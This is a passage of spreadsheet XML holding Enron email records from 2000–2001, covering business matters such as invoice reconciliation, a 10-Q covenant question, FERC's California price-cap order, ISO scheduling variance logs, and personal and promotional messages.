about Friday night.  I know you have been working long hours and Friday is_x000D_
just a bad day.  Even though I would like to see you, if you have a repeat_x000D_
of last week then I understand if you want to call it off.  In that case_x000D_
maybe we can meet up some other time.  Although I do remember a girl telling_x000D_
me once that weekends are her time and she was going to go out no matter_x000D_
what._x000D_
_x000D_
Let me know what you think and I'll probably give you a call Friday_x000D_
afternoon to see how things are going._x000D_
_x000D_
Kyle_x000D_
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t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 07:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'joe.kishkill@enron.com', 'wes.colwell@enron.com', 'james.bannantine@enron.com', 'orlando.gonzalez@enron.com', 'john.lavorato@enron.com', 'richard.shapiro@enron.com', 'mark.frevert@enron.com', 'joseph.deffner@enron.com', 'greg.whalley@enron.com', 'james.hughes@enron.com', 'david.oxley@enron.com', 'rebecca.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>SA Memo - Revised</t>
  </si>
  <si>
    <t xml:space="preserve">Updated draft memo._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/06/2000 _x000D_
03:37 PM ---------------------------_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
12/06/2000 01:14 PM_x000D_
To: Orlando Gonzalez/SA/Enron@Enron, Joe Kishkill/SA/Enron@Enron, James M _x000D_
Bannantine/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark Frevert/NA/Enron@Enron, _x000D_
John J Lavorato/Corp/Enron@Enron, Greg Whalley/HOU/ECT@ECT, Richard _x000D_
Shapiro/NA/Enron@Enron, Joseph Deffner/HOU/ECT@ECT, Mark E _x000D_
Haedicke/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT, Wes Colwell/HOU/ECT@ECT, _x000D_
Rebecca McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James A _x000D_
Hughes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
Subject: SA Memo_x000D_
_x000D_
Guys, please take a read of the draft memo - would like to send out tommorrow._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 02:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Today's Verse -- Matthew 6:15</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning Duck, I especially liked this prayer this morning and wanted_x000D_
to share it with you. Please don't forget to put money aside for Candis on_x000D_
tomorrow.  I wouldn't ask for it if  I hadn't been spending money left &amp;_x000D_
right_x000D_
for additional things like extra food and toiletries for company. She will_x000D_
also_x000D_
need spending money. The 1-day pass is $13.00 ._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
: FW: Today's Verse -- Matthew 6:15_x000D_
_x000D_
_x000D_
Always be willing to forgive....Jesus forgives you!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thursday, June 15, 2000_x000D_
_x000D_
VERSE:_x000D_
   But if you do not forgive men their sins, your Father will not_x000D_
forgive your sins._x000D_
    -- Matthew 6:15_x000D_
_x000D_
_x000D_
THOUGHT:_x000D_
   Can you think of a more frightening thought than God not_x000D_
forgiving our sins?  We know how much he paid so our sins could be_x000D_
forgiven!  We know how much he loves us!  We know how much he wants_x000D_
us to be in relationship with him!  So why would he withhold his_x000D_
forgiveness?  Because we demonstrate that we have not received it_x000D_
or do not understand it!  God is gracious and he will not accept_x000D_
those who are not gracious!_x000D_
_x000D_
PRAYER:_x000D_
   Holy God, there are those that I do find it difficult to_x000D_
forgive.  Please, right now while I'm praying, soften my heart by_x000D_
your Spirit, cleanse my soul of any bitterness or resentment, and_x000D_
please empower me to let go of the pain of the past and forgive.  I_x000D_
thank you for this grace to not only be forgiven, but to also_x000D_
forgive.  In Jesus' name I pray. Amen._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 11:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeremy.wong@enron.com'})</t>
  </si>
  <si>
    <t>FW: New Asian</t>
  </si>
  <si>
    <t>John:_x000D_
_x000D_
We are testing the new version of the Asian model from Research, and there _x000D_
are a couple of issues_x000D_
we need to resolve with Paulo.  We should have a version ready for your _x000D_
testing by the end of this week.  _x000D_
I will inform you and Errol when we complete our testing._x000D_
_x000D_
Thank you,_x000D_
Jeremy_x000D_
x3-0573_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Issler, Paulo  _x000D_
Sent: Tuesday, April 24, 2001 2:06 PM_x000D_
To: Tang, Shouan_x000D_
Cc: Wong, Jeremy_x000D_
Subject: New Asian_x000D_
_x000D_
Here is the file for the Asian function. I am sorry about changing the _x000D_
comments to a C++ style. _x000D_
You may easily change it back to C style by using the replace function in _x000D_
MS-Word or from any other editor. _x000D_
_x000D_
_x000D_
_x000D_
Paulo Issler</t>
  </si>
  <si>
    <t>Thu, 2 Mar 2000 00:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'regina.blackshear@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'amber.limas@enron.com', 'tharsilla.broussard@enron.com', 'angela.barnett@enron.com', 'eve.puckett@enron.com', 'yvonne.acosta@enron.com', 'judy.walters@enron.com', 'michelle.neville@enron.com', 'grhrdh@aol.com', 'christopher.hargett@enron.com', 'amber.ebow@enron.com', 'l_carter61@hotmail.com', 'judy.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Fw: [Fwd: Fwd: Birth Control]</t>
  </si>
  <si>
    <t xml:space="preserve">this is cute._x000D_
---------------------- Forwarded by Regina Blackshear/Corp/Enron on _x000D_
03/02/2000 08:24 AM ---------------------------_x000D_
_x000D_
_x000D_
"BENEDICT PETERS" &lt;bouncing98@hotmail.com&gt; on 03/01/2000 05:18:22 PM_x000D_
To: Regina.Blackshear@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Fwd: Fw: [Fwd: Fwd: Birth Control]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;Subject: Fw: [Fwd: Fwd: Birth Control]_x000D_
&gt;Date: Tue, 29 Feb 2000 18:30:39 -0400_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com_x000D_
_x000D_
 - Laughing.htm_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 03:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>give me a call when you get a chance.  i got your message this morning.  i _x000D_
don't think i will get to austin for at least a few weeks so it would be best _x000D_
if you just mailed the check.</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 09:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.superty@enron.com', 'scott.neal@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">The first invoice for $5.4 million went out a couple of weeks ago.  CES came _x000D_
back to us and said they were not going to pay.  They claimed that the total _x000D_
of all of the invoices to this date that they have already paid had covered _x000D_
that amount.  I have researched all of their invoices, and it looks like _x000D_
there was a demand invoice in the system for the month of June for _x000D_
approximately $6 million to much.  CES incorporated a credit for that invoice _x000D_
in with the charge for $5.4 million, netting out to approximately $600,000.  _x000D_
I am meeting with CES on Thursday to see if we are in agreement.  The other _x000D_
invoice for $7.5 million was sent out last week, CES is in agreement and the _x000D_
payment should be here shortly._x000D_
   If you have any questions don't hesitate to call me._x000D_
_x000D_
Molly _x000D_
x34249_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robert Superty_x000D_
08/14/2000 04:06 PM_x000D_
To: Molly Sumrow/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CES Update_x000D_
_x000D_
Molly, please see Scott's note below and give us an update._x000D_
_x000D_
Thanks - Bob_x000D_
---------------------- Forwarded by Robert Superty/HOU/ECT on 08/14/2000 _x000D_
04:01 PM ---------------------------_x000D_
_x000D_
_x000D_
Scott Neal_x000D_
08/14/2000 03:18 PM_x000D_
To: Robert Superty/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: CES Update  _x000D_
_x000D_
What is the status of these invoices/payments?_x000D_
_x000D_
_x000D_
_x000D_
Robert Superty_x000D_
08/03/2000 04:02 PM_x000D_
To: Sally Beck/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Brent A _x000D_
Price/HOU/ECT@ECT, Bryce Baxter/HOU/ECT@ECT_x000D_
cc: Molly Sumrow/HOU/ECT@ECT _x000D_
Subject: CES Update_x000D_
_x000D_
FYI - ongoing CES reconciliation. At this point we will be receiving app. _x000D_
$5.4M (invoice sent on 7/27) with another $7.5M to be billed to them next _x000D_
week._x000D_
_x000D_
Still more to come, for details read the attached from Molly._x000D_
_x000D_
Bob _x000D_
---------------------- Forwarded by Robert Superty/HOU/ECT on 08/03/2000 _x000D_
03:52 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Molly Sumrow                           08/03/2000 03:47 PM_x000D_
	_x000D_
_x000D_
To: Robert Superty/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT, Beverly _x000D_
Beaty/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CES Update_x000D_
_x000D_
Attached is the current status of the CES reconciliation.  Please call me if _x000D_
you have any questions._x000D_
_x000D_
_x000D_
_x000D_
Thank You,_x000D_
_x000D_
Molly_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 08:58:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nora.dobin@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jordan.mintz@enron.com', 'e..haedicke@enron.com'})</t>
  </si>
  <si>
    <t>ENE Form 10-Q Accounting Matter --  Initial Report</t>
  </si>
  <si>
    <t>I understand that AA may not provide the review of interim financial information that the SEC requires to be obtained in respect of Form 10-Q filings ( Article 10 of Regulation SX).  Jordan asked me to give an update in an hour about the impact of this on covenants in ENE credit and other instruments requiring delivery of ENE's 10Qs._x000D_
_x000D_
(1)	I have not yet been able to ascertain whether (i) the AA review or any statement in respect thereof is required to be filed with the SEC, or (ii) if not so required, ENE would file the 10-Q without having obtained the review.  _x000D_
_x000D_
(2)	ENE's 364-day corporate revolver (and most other ENE instruments containing the subject covenant) requires ENE to make available either on "EDGAR" or ENE's home page on World Wide Web, or otherwise make available to the Banks promptly after the filing or sending thereof, and in any event within 75 days after the end of each of the first three fiscal quarters, a copy of ENE's report on Form 10-Q.  If ENE does not file the 10-Q, it arguably could nevertheless send it to the banks as confidential information (to comply with Regulation FD) within the required time period and satisfy the covenant.  The revolver contains a confidentiality provision._x000D_
Failure to deliver the 10-Q constitutes an Event of Default under the revolver if the failure continues for more than 30 days after ENE has received notice thereof by the Paying Agent._x000D_
_x000D_
I will continue to pursue information from the accountants._x000D_
_x000D_
Regards, NJD_x000D_
_x000D_
Nora J. Dobin_x000D_
Senior Counsel_x000D_
Enron Corp. - Global Finance_x000D_
1400 Smith Street, Suite 2083_x000D_
Houston, Texas 77002_x000D_
_x000D_
Phone:  713/345-7723_x000D_
Fax:      713/853-9252</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 09:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FERC news release on Ca. relief emergency</t>
  </si>
  <si>
    <t>----- Forwarded by Cynthia Sandherr/Corp/Enron on 12/13/2000 05:32 PM -----_x000D_
_x000D_
	Nancy Bagot_x000D_
	12/13/2000 05:31 PM_x000D_
		 _x000D_
		 To: Linda Robertson/NA/Enron@ENRON, Cynthia Sandherr/Corp/Enron@ENRON, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Donna Fulton/Corp/Enron@ENRON, Sarah _x000D_
Novosel/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: FERC news release on Ca. relief emergency_x000D_
_x000D_
FERC has issued a press release on the California situation._x000D_
URL is http://www.ferc.fed.us/news1/pressreleases/ca-relief.pdf_x000D_
_x000D_
Text is below:_x000D_
_x000D_
NEWS RELEASE_x000D_
News Media Contact: For Immediate Release_x000D_
Hedley Burrell _x000D_
_x000D_
December 8, 2000_x000D_
(202) 208-0680 Docket Nos. ER01-607-_x000D_
000; EL00-95-000; EL00-98-000_x000D_
_x000D_
COMMISSION MOVES TO BRING RELIEF TO CALIFORNIA_x000D_
ELECTRICITY MARKETS_x000D_
_x000D_
In response to emergency conditions that exist in the California electricity_x000D_
markets, which have faced supply shortages and snowballing prices, the _x000D_
Federal Energy_x000D_
Regulatory Commission today approved a price cap change requested by the _x000D_
California_x000D_
Independent System Operator (ISO). The Commission also took steps to permit_x000D_
qualifying facilities (QFs) to operate at full capacity._x000D_
_x000D_
The ISO's purchase price cap of $250/Mwh will be lifted. Bids above that _x000D_
amount_x000D_
will be allowed but will not set the clearing price paid to all sellers, as _x000D_
does the current_x000D_
purchase price cap. This should attract more bids and alleviate chronic _x000D_
supply shortages._x000D_
Those bidding above $250 will be required to report their bids to the _x000D_
Commission_x000D_
on a weekly basis and provide certain cost information._x000D_
_x000D_
The non-profit ISO and PX began operations in California in 1998. The PX is _x000D_
the_x000D_
scheduling coordinator for the IOUs as well as other market participants. The _x000D_
ISO_x000D_
operates and controls most of the transmission system in California._x000D_
_x000D_
In addition to the $250 purchase price cap, the Commission also authorized the_x000D_
ISO to penalize participating generators that refuse to operate in response _x000D_
to an ISO_x000D_
request in an emergency. They will be charged an amount equal to twice the _x000D_
highest_x000D_
price the ISO paid for energy for each hour in which the participating _x000D_
generator failed to_x000D_
respond._x000D_
_x000D_
The ISO's costs of obtaining energy through bids above the purchase price cap _x000D_
or_x000D_
through out-of-market dispatches will be assigned to scheduling coordinators _x000D_
who_x000D_
depend too much on spot markets._x000D_
_x000D_
The Commission's second order enables QF entities to generate at full capacity_x000D_
which in the past could have caused them to lose QF status. QF generators are _x000D_
small_x000D_
power producers that use alternative fuels, such as solar or biomass, and _x000D_
cogenerators_x000D_
that produce both electricity and steam for commercial use._x000D_
_x000D_
The order on QF entities was in response to a request from a California QF._x000D_
The orders are effective immediately._x000D_
_x000D_
To view the Commission orders in full go to "What's New" at www.ferc.fed.us._x000D_
R-00-82 (30)</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 15:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/11/01; HourAhead hour: 23;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/11/01; HourAhead hour: 23;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Energy Import/Export schedule._x000D_
Variances detected in SC Trades schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041123.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 23 / Preferred:   2.00 / Final:   1.95)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_GUZ_x000D_
  ENGY_TYPE: FIRM_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 23 / Preferred:  12.00 / Final:  11.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_DODGERS_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 23 / Preferred:  20.00 / Final:  19.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TRADING_SC: NCPA_x000D_
  PNT_OF_INTRC: ZP26_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 2_x000D_
  DEAL_NO: 1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 14:34:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Third Friday Lunch</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	Ciach, Sandra R  _x000D_
&gt; Sent:	Tuesday, October 16, 2001 9:34 AM_x000D_
&gt; To:	'rdeangelis@energy-law-group.com'; 'difellman@energy-law-group.com';_x000D_
&gt; 'askaff@energy-law-group.com'; 'jbennett@gmssr.com'; 'jclark@gmssr.com';_x000D_
&gt; 'bcragg@gmssr.com'; 'mday@gmssr.com'; 'kfugere@gmssr.com';_x000D_
&gt; 'tmacbride@gmssr.com'; 'jmctarnaghan@gmssr.com'; 'aozols@gmssr.com';_x000D_
&gt; 'jsqueri@gmssr.com'; 'elaine.duncan@verizon.com';_x000D_
&gt; 'margo.friedrich@verizon.com'; 'kurt.rasmussen@verizon.com';_x000D_
&gt; 'jenny.wong@verizon.com'; 'wbagley@nossaman.com'; 'jguzman@nossaman.com';_x000D_
&gt; 'mmattes@nossaman.com'; 'Mp3232@msg.pacbell.com';_x000D_
&gt; 'cp2848@msg.pacbell.com'; Brown, Michelle; Chaw, Sabrina J.; Cherry,_x000D_
&gt; Brian; Clarke, John; De La Torre, Rose; Guliasi, Les; Novak, Todd; Shaw,_x000D_
&gt; Susan; Smith, Anita (RegRel); Stock, William; Storz, Paul; Tatai, Sharon;_x000D_
&gt; 'jfontela@sempra.com'; 'lkatz@sempra.com'; 'rlecamus@sempra.com';_x000D_
&gt; 'jpeck@sempra.com'; 'cswartz@sempra.com'; 'bruce.foster@sce.com';_x000D_
&gt; 'gansecka@sce.com'; 'hoovermr@sce.com'; 'hughesjp@sce.com';_x000D_
&gt; 'schoongl@sce.com'; 'jeanne.smith@sce.com'; 'nhogue@turn.org';_x000D_
&gt; 'mflorio@turn.org'_x000D_
&gt; Subject:	Third Friday Lunch_x000D_
&gt; _x000D_
&gt; Dear Third Friday Participant,_x000D_
&gt; _x000D_
&gt; As you know, our usual Third Friday Luncheons were derailed by_x000D_
&gt; California's energy crisis.  PacBell hosted the last luncheon last_x000D_
&gt; November, and in December, the attorneys hosted the holiday luncheon._x000D_
&gt; PG&amp;E believes that these luncheons offer the regulatory community a_x000D_
&gt; wonderful opportunity to come together and discuss important issues that_x000D_
&gt; affect us all.  PG&amp;E would like to reinstate these luncheons.  _x000D_
&gt; _x000D_
&gt; PG&amp;E is pleased to kick-off a new round of  Third Friday luncheons._x000D_
&gt; Please join us on Wednesday, October 31, 2001, at Boulevard, located at_x000D_
&gt; One Mission Street at Steuart Street.  Hors D'oeuvres will be served at_x000D_
&gt; 11:30 a.m., followed by lunch at noon._x000D_
&gt; _x000D_
&gt; We have invited PG&amp;E's, Senior Vice President of Public Affairs, Dan_x000D_
&gt; Richard, to speak about PG&amp;E's recent Plan of Reorganization._x000D_
&gt; _x000D_
&gt; We hope that you can join us for this event.  Please RSVP to Rose de la_x000D_
&gt; Torre at _x000D_
&gt; (415) 973-4716, no later than October 25, 2001.  Space is limited to 40_x000D_
&gt; individuals, so please regulate your company's attendance._x000D_
&gt; _x000D_
&gt; _x000D_
&gt; Sandra Ciach_x000D_
&gt; PG&amp;E_x000D_
&gt; Regulatory Relations_x000D_
&gt; 415.973.7572_x000D_
&gt; </t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 00:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryce.baxter@enron.com'})</t>
  </si>
  <si>
    <t>Re: Meeting to prepare for TCPL meeting</t>
  </si>
  <si>
    <t>I just got back in the office from a week off, so I am catching up this _x000D_
morning.  I will unfortunately be unable to attend your meeting this _x000D_
morning.  I need to try and get prepared for the afternoon meeting.  Thanks._x000D_
PL</t>
  </si>
  <si>
    <t>frozenset({'mike.jordan@enron.com'})</t>
  </si>
  <si>
    <t>Disbanding of Joel Henenberg's Team</t>
  </si>
  <si>
    <t xml:space="preserve">I have a stretch goal for the operations budget under Enron Americas to _x000D_
reduce costs by the end of the year.  To this end, I have recently studied _x000D_
possible options for reaching the targeted savings.  To make the best _x000D_
decision on this, I have reviewed functions within my team on the basis of _x000D_
core versus non-core functions, and the inherent cost versus value _x000D_
proposition._x000D_
_x000D_
As a result, I made the decision last week to disband Joel Henenberg's team.  _x000D_
To fulfill the role of Joel and his team in leading IT initiatives, we will _x000D_
lean on the appropriate IT project managers and the business sponsors/end _x000D_
users.   _x000D_
_x000D_
Joel and his team were told of this decision on Friday afternoon last week.  _x000D_
Our HR rep spent some time with the team explaining the corporate _x000D_
re-deployment service that they all will be working through over the next few _x000D_
weeks.  _x000D_
Let me know if you have any questions regarding this.  While it was a tough _x000D_
decision, I feel comfortable having made it.    </t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 07:50:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Prime Account Needed</t>
  </si>
  <si>
    <t>The company for which the account needs to be set up is:_x000D_
_x000D_
ECT Europe Finance Inc. (company 030S)._x000D_
_x000D_
I believe that this company's constitutional docs are held in Houston - and my guess is that the authorized officers are also in Houston.  I suggest that you liaise with the company secretarial department in Houston (Kate Cole) to resolve this._x000D_
_x000D_
Let me know if I can be of further help._x000D_
_x000D_
Edmund_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: 	Doukas, Tom  _x000D_
Sent:	09 October 2001 15:02_x000D_
To:	Wall, David; Cooper, Edmund; Kinneman, Jeff; Pizzolato, Paul_x000D_
Cc:	Shackleton, Sara; Heard, Marie_x000D_
Subject:	FW: Prime Account Needed_x000D_
Importance:	High_x000D_
_x000D_
Edmund can you please help out on this?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Tuesday, October 09, 2001 8:31 AM_x000D_
To:	Doukas, Tom_x000D_
Cc:	Heard, Marie_x000D_
Subject:	FW: Prime Account Needed_x000D_
Importance:	High_x000D_
_x000D_
Tom:  There is no existing Enron company named "ECT Europe Investments Inc.".  We need the legal name of the company.  Also, does that company have existing resolutions for opening brokerage accounts?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Doukas, Tom  _x000D_
Sent:	Tuesday, October 09, 2001 7:42 AM_x000D_
To:	Shackleton, Sara_x000D_
Cc:	Heard, Marie_x000D_
Subject:	Prime Account Needed_x000D_
Importance:	High_x000D_
_x000D_
We urgently need to have a new prime account set up at Bear Stearns to facilitate moving the Anker Coal positions from ECI into a fair value entity._x000D_
_x000D_
I had forwarded this to Frank Sayre as both of you were out on Friday.  This is background information on why we need to set up the prime account for ECT Europe Investments Inc._x000D_
_x000D_
We have been given until the 12th to move the Anker positions to the ECT Entity.  The account will need to be fully open and funded before the positions can move._x000D_
_x000D_
As this is of the highest priority please let me know immediately if there will be any issue with completing paperwork by tomorrow._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Doukas, Tom  _x000D_
Sent:	Friday, October 05, 2001 10:05 AM_x000D_
To:	Sayre, Frank_x000D_
Subject:	FW: Anker_x000D_
Importance:	High_x000D_
_x000D_
FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cooper, Edmund  _x000D_
Sent:	Monday, October 01, 2001 1:22 PM_x000D_
To:	Doukas, Tom_x000D_
Subject:	Anker_x000D_
Importance:	High_x000D_
_x000D_
Dear Tom,_x000D_
_x000D_
As we discussed, here are the stipulations we talked about regarding the entity to which Enron Credit Inc. can transfer the Anker stock and bonds. Those stipulations regarding the transferee entity are that it:_x000D_
_x000D_
1. must be a US company (this is for tax reasons)_x000D_
2. must be a "fair value" entity under US GAAP (accounting reasons)_x000D_
3. must by an entity whose results roll up to Enron Europe Limited (account reporting purposes)_x000D_
4. must be able to hold stocks and bonds viz. have a brokerage account_x000D_
_x000D_
Of existing Enron entities, the only entity that meets 1. to 3. is ECT Europe Investments Inc. Therefore, this entity would need a brokerage account. This would appear to be the easiest (!) way in which to meet all four conditions._x000D_
_x000D_
As we discussed, even if we gave Bear Stearns a global Enron Corp. guaranty I do not think that ECT Europe Investments Inc. would be able to take advantage of Enron Credit Inc.'s funding arrangements unless it had further 0% risk weighted transactions held in the account._x000D_
_x000D_
Thanks and regards,_x000D_
_x000D_
Edmund</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 02:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Feb 01 Prod: Sale to Teco Gas Processing</t>
  </si>
  <si>
    <t>Sale_x000D_
Deal # 235670_x000D_
Expired 12/00_x000D_
_x000D_
_x000D_
Julie-_x000D_
_x000D_
This deal has expired for Teco Gas Processing, but we did have a sale in _x000D_
02/01._x000D_
Should this deal be extended?_x000D_
_x000D_
Pls let me know ,so that I can redraft the sale through Unify._x000D_
_x000D_
Katherine_x000D_
5-8643_x000D_
_x000D_
Unable to draft volume in Unify due to the expired deal ticket;</t>
  </si>
  <si>
    <t>Sun, 4 Mar 2001 20:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 3/5/01; HourAhead hour: 5;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 3/5/01; HourAhead hour: 5;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
Variances detected in Energy Import/Export schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001030505.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 5 / Preferred:  29.00 / Final:  15.60)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ARCO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/5/01_x000D_
  UNIT_ID: CARBGN_6_UNIT 1_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 5 / Preferred:  18.00 / Final:   9.60)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: DELANO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/5/01_x000D_
  UNIT_ID: PANDOL_6_UNIT_x000D_
_x000D_
_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 5 / Preferred: 100.00 / Final:  53.40)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstCA_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/5/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_5001_x000D_
  ENGY_TYPE: FIRM_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 5 / Preferred:  75.00 / Final:  17.28)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstNW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/5/01_x000D_
  TIE_POINT: SYLMAR_2_NOB_x000D_
  INTERCHG_ID: CISO_EPMI_3000_x000D_
  ENGY_TYPE: FIRM_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 5 / Preferred:  75.00 / Final:  17.40)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTltNW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/5/01_x000D_
  TIE_POINT: SYLMAR_2_NOB_x000D_
  INTERCHG_ID: CISO_EPMI_6000_x000D_
  ENGY_TYPE: FIRM_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 5 / Preferred: 100.00 / Final:  53.40)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstSW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/5/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_5000_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 12 Aug 2001 13:31:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'golfboxx@golfboxx.com'})</t>
  </si>
  <si>
    <t>August is known for HOT deals!</t>
  </si>
  <si>
    <t>Dear Golfboxx.com Members,_x000D_
_x000D_
The heat is here to stay, but tee times are fading fast. The deals this month_x000D_
are spectacular. Take a look at the special offers that we have for you._x000D_
Go to http://www.golfboxx.com and print out your coupons today. Click_x000D_
on Courses on the home page and register at your favorite course. We will_x000D_
be giving away free rounds of golf, equipment, and other prizes so register_x000D_
today._x000D_
_x000D_
Here are the specials and announcements for this month:_x000D_
http://www.golfboxx.com_x000D_
_x000D_
****************************************************************************_x000D_
_x000D_
Greatwood_x000D_
_x000D_
"ALL YOU CAN CAN" JUST GOT BETTER FOR THE MONTH OF AUGUST!!!!!!_x000D_
_x000D_
Monday - Wednesday it is now $35.00 for all the golf , all the range balls,_x000D_
all the food (some restrictions apply) and all the fountain drinks you can_x000D_
